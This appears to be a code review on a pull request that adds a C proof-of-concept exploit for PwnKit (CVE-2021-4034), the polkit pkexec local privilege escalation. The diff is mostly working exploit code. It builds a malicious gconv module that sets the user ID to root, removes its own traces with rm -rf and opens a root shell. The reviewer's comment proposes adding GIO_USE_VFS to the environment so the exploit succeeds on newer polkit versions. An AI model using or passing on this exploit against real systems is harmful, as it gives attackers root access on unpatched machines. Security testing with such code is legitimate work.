data/exploits/CVE-2021-4034/cve_2021_4034.c

```diff
@@ -0,0 +1,31 @@
+/*
+ * Proof of Concept for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) by Andris Raugulis <moo@arthepsy.eu>
+ * Advisory: https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
+ */
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+char *shell = 
+	"#include <stdio.h>\n"
+	"#include <stdlib.h>\n"
+	"#include <unistd.h>\n\n"
+	"void gconv() {}\n"
+	"void gconv_init() {\n"
+	"	setuid(0); setgid(0);\n"
+	"	seteuid(0); setegid(0);\n"
+	"	system(\"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh\");\n"
+	"	exit(0);\n"
+	"}";
+
+int main(int argc, char *argv[]) {
+	FILE *fp;
+	system("mkdir -p 'GCONV_PATH=.'; touch 'GCONV_PATH=./pwnkit'; chmod a+x 'GCONV_PATH=./pwnkit'");
+	system("mkdir -p pwnkit; echo 'module UTF-8// PWNKIT// pwnkit 2' > pwnkit/gconv-modules");
+	fp = fopen("pwnkit/pwnkit.c", "w");
+	fprintf(fp, "%s", shell);
+	fclose(fp);
+	system("gcc pwnkit/pwnkit.c -o pwnkit/pwnkit.so -shared -fPIC");
+	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", NULL };
```

Comment:
It looks like newer versions of polkit (for example, in Arch Linux) [set](https://gitlab.freedesktop.org/polkit/polkit/-/blob/539bf5dcca489534f42798a4500aca4b1a8ec8d0/src/programs/pkexec.c#L505) `GIO_USE_VFS` environment variable. It will cause the `envp[]` array to relocate in process memory if the variable is not defined. In this case, the write to `argv[1]` misses the `envp[]` and the exploit fails. See [link](https://github.com/v-rzh/CVE-2021-4034#whats-the-deal-with-gio_use_vfs).

The suggestion is to set the variable beforehand, so the size of the `envp[]` array doesn't change and the array is not relocated:
```suggestion
	char *env[] = { "pwnkit", "PATH=GCONV_PATH=.", "CHARSET=PWNKIT", "SHELL=pwnkit", "GIO_USE_VFS=", NULL };
```

(It seems that the particular value of `GIO_USE_VFS` is irrelevant, so it can be omitted. I don't know whether `local` or any other value would improve stability on different platforms.)